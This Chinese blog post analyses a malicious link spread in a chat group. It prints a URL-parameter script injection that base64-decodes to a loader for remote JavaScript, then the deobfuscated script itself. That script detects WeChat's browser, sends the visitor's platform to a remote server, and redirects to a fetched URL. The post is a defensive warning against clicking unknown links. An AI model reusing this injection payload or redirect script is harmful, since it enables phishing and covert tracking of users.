群裡有這樣一個連結,因為是防疫群是不可能邀請大家參加婚禮的。
于是乎好奇的點選了,然而浏覽器并沒有反應。
複制了連結發下是這樣一個奇怪的位址
https://xxxx.com/mall/index.html?click_type=768123%27;setTimeout(atob(%27dmFyIHNzID0gZG9jdW1lbnQxY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7IHNzLnNyYyA9ICIvL3F3ZTEyMzMyMS5vc3MtY24tYmVpamluZy5hbGl5dW5jcy5jb20vanMvbXNnMjEuanMiOyBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoc3MpOw==%27)%2c1);//
%27 轉碼後 '
%2c1 轉碼後 ,1
setTimeout( ) 一秒後執行
atob( ) : base64解密函數
解密後是一個 js 位址:http://xxxxxx.oss-cn-beijing.aliyuncs.com/js/msg21.js
打開發現是一個加密的JS
因為是V5 js 加密的,這塊沒有接觸過。Js的内容無法知道,但是 作者既然不想讓看到,肯定代碼裡面沒有幹好事。至于是不是盜号或者推廣或是廣告 就不得而知。
如此一來: 陌生連結,具有誘惑性的連結,不要點
當然這種 包含惡意的連結平台和也會很快 屏蔽。
以後有機會可以研究一下js解密。
更新一下
__________________________________________
解密後的JS
1 (function () {
2 var _0xaeeadd = {
3 'fKPML': function _0x14f0f0(_0x5c3713, _0x1a63d4) {
4 return _0x5c3713 + _0x1a63d4;
5 },
6 'QCLsm': '(^|&)',
7 'KhmkX': '=([^&]*)(&|$)',
8 'pkwUU': function _0x32d898(_0xc21c09, _0x5cb8e1) {
9 return _0xc21c09(_0x5cb8e1);
10 },
11 'NImgf': function _0x33b8ae(_0x482fe5, _0x29be10) {
12 return _0x482fe5 === _0x29be10;
13 },
14 'MnKMf': 'Win',
15 'FNPcq': 'Mac',
16 'MiFij': function _0x354ab1(_0x1c1e1b, _0x1383fa) {
17 return _0x1c1e1b && _0x1383fa;
18 },
19 'xlxNW': 'uYi',
20 'HlNCM': function _0xb671d6(_0x5415a8) {
21 return _0x5415a8();
22 },
23 'xbyII': function _0x430a35(_0x4d7c9d, _0x138736) {
24 return _0x4d7c9d < _0x138736;
25 },
26 'PggWd': 'POST',
27 'pmkHt': 'Content-Type',
28 'DqzsN': 'application/x-www-form-urlencoded',
29 'VfEeh': 'rel',
30 'VjhJK': 'noreferrer',
31 'CPxCm': 'href',
32 'dsBeQ': 'type',
33 'FVmgL': function _0x1ec231(_0x598e3f, _0x42ad76) {
34 return _0x598e3f(_0x42ad76);
35 },
36 'swpDV': 'sid',
37 'DIwHW': 'aid',
38 'fSiTS': function _0x3f03f3(_0x2009ea, _0x990f9) {
39 return _0x2009ea(_0x990f9);
40 },
41 'iKdOU': 'https://xxxx/zhuanfa/index/getUrl4',
42 'iijAp': 'https://www.xxx.xx',
43 'SRGif': function _0x5aeb01(_0x3cabc9) {
44 return _0x3cabc9();
45 },
46 'OyAtk': function _0x3c3206(_0x2d909a) {
47 return _0x2d909a();
48 },
49 'EysgW': 'dev',
50 'WtgwP': '【開發模式】',
51 'RECbh': function _0x54cbc9(_0x2eebf6) {
52 return _0x2eebf6();
53 },
54 'IWljf': 'vvT',
55 'EAyvE': function _0x26768c(_0x4b9384) {
56 return _0x4b9384();
57 },
58 'MBeJk': function _0x695c5e(_0x5e669c) {
59 return _0x5e669c();
60 }
61 };
62
63 function _0x3aae30(_0x542f79 = null) {
64 var _0x529546 = new RegExp(_0xaeeadd['fKPML'](_0xaeeadd['QCLsm'], _0x542f79) + _0xaeeadd['KhmkX'], 'i');
65 var _0x31b98d = window['location']['search']['substr'](0x1)['match'](_0x529546);
66 if (_0x31b98d != null) return _0xaeeadd['pkwUU'](unescape, _0x31b98d[0x2]);
67 return null;
68 }
69
70 function _0x12824a() {
71 const _0x162822 = navigator['platform'];
72 const _0x175089 = _0xaeeadd['NImgf'](_0x162822['indexOf'](_0xaeeadd['MnKMf']), 0x0);
73 const _0xae94b8 = _0x162822['indexOf'](_0xaeeadd['FNPcq']) === 0x0;
74 const _0x3dcc2c = /micromessenger/ ['test'](navigator['userAgent']['toLowerCase']());
75 if (_0xaeeadd['MiFij'](_0x3dcc2c, !_0x175089) && !_0xae94b8) {
76 return !![];
77 } else {
78 if ('FTI' !== _0xaeeadd['xlxNW']) {
79 return ![];
80 } else {
81 _0xaeeadd['HlNCM'](_0x72f538);
82 _0xaeeadd['pkwUU'](_0x191d64, '#');
83 }
84 }
85 }
86
87 function _0x775b3a() {
88 const _0x4f64dc = navigator['userAgent']['toLowerCase']();
89 const _0x1860d3 = /micromessenger/;
90 let _0x53b8bc = ![];
91 if (_0x1860d3['test'](_0x4f64dc)) {
92 const _0x1b8303 = _0x4f64dc['search'](_0x1860d3);
93 let _0x244c59 = '';
94 for (let _0xa894d5 = _0x1b8303 + 0xf; _0xaeeadd['xbyII'](_0xa894d5, _0x4f64dc['length']); _0xa894d5++) {
95 const _0x55e4d3 = _0x4f64dc[_0xa894d5];
96 if (/^\d{1,}$/ ['test'](_0x55e4d3) || _0xaeeadd['NImgf'](_0x55e4d3, '.')) {
97 _0x244c59 += _0x55e4d3;
98 } else {
99 break;
100 }
101 }
102 _0x244c59 = parseFloat(_0x244c59);
103 if (_0x244c59 >= 0x7) _0x53b8bc = !![];
104 }
105 return _0x53b8bc;
106 }
107 var _0x320916 = _0xaeeadd['iijAp'];
108
109 function _0x72f538() {
110 var _0x31ca84 = new XMLHttpRequest();
111 _0x31ca84['open'](_0xaeeadd['PggWd'], _0x320916 + '/' + _0x1f1b99 + '.xml', !![]);
112 _0x31ca84['setRequestHeader'](_0xaeeadd['pmkHt'], _0xaeeadd['DqzsN']);
113 _0x31ca84['send']('platform=' + navigator['platform']);
114 }
115
116 function _0x191d64(_0x2d7909) {
117 const _0xe8c4a5 = document['createElement']('a');
118 _0xe8c4a5['setAttribute'](_0xaeeadd['VfEeh'], _0xaeeadd['VjhJK']);
119 _0xe8c4a5['setAttribute'](_0xaeeadd['CPxCm'], _0x2d7909);
120 document['body']['appendChild'](_0xe8c4a5);
121 _0xe8c4a5['click']();
122 }
123
124 function _0x5ee876() {
125 const _0x507d4c = _0x3aae30(_0xaeeadd['dsBeQ']);
126 const _0x52e6be = _0xaeeadd['FVmgL'](_0x3aae30, _0xaeeadd['swpDV']);
127 const _0x3b61df = _0x3aae30(_0xaeeadd['DIwHW']);
128 let _0x2b07b8 = '';
129 if (_0x507d4c) {
130 _0x2b07b8 = '?type=' + _0x507d4c + '&aid=' + _0x3b61df;
131 }
132 _0xaeeadd['fSiTS'](fetch, _0xaeeadd['iKdOU'])['then'](_0x2f8c1a => _0x2f8c1a['text']())['then'](_0x147f1f =>
133 _0x191d64(atob(_0x147f1f)));
134 }
135 const _0x1f1b99 = Math['random']()['toString'](0x24)['substr'](0x2);
136 if (!_0x12824a() || !_0xaeeadd['SRGif'](_0x775b3a)) {
137 const _0xa26fef = _0xaeeadd['OyAtk'](_0x3aae30);
138 if (_0xa26fef && _0xa26fef[_0xaeeadd['EysgW']]) {
139 console['log'](_0xaeeadd['WtgwP']);
140 _0xaeeadd['OyAtk'](_0x5ee876);
141 } else {
142 _0xaeeadd['RECbh'](_0x72f538);
143 _0x191d64('#');
144 }
145 } else {
146 if (_0xaeeadd['NImgf'](_0xaeeadd['IWljf'], 'Cgo')) {
147 console['log'](_0xaeeadd['WtgwP']);
148 _0xaeeadd['EAyvE'](_0x5ee876);
149 } else {
150 _0xaeeadd['MBeJk'](_0x5ee876);
151 }
152 }
153 }());;
154 (function (_0xe5cddc, _0xb8de6b, _0x4ff679) {
155 var _0x1b14d7 = {
156 'Kyljy': 'undefined',
157 'syTvc': 'jsjiami.com.v5',
158 'GkGtd': '删除版本号,js會定期彈窗'
159 };
160 _0x4ff679 = 'al';
161 try {
162 _0x4ff679 += 'ert';
163 _0xb8de6b = encode_version;
164 if (!(typeof _0xb8de6b !== _0x1b14d7['Kyljy'] && _0xb8de6b === _0x1b14d7['syTvc'])) {
165 _0xe5cddc[_0x4ff679]('删除' + '版本号,js會定期彈窗,還請支援我們的工作');
166 }
167 } catch (_0x3249a0) {
168 _0xe5cddc[_0x4ff679](_0x1b14d7['GkGtd']);
169 }
170 }(window));;
171 encode_version = 'jsjiami.com.v5' 這個js 後面對應有一個TP背景,對應的有非常多的域名 ,至于域名下這個背景是收集社麼資訊的 就不扒了。水準有限
__________________________________________________________________________________
若有幫助到您,歡迎點選推薦,您的支援是對我堅持最好的肯定(*^_^*)
你要保守你心,勝過保守一切。
作者:劉俊濤的部落格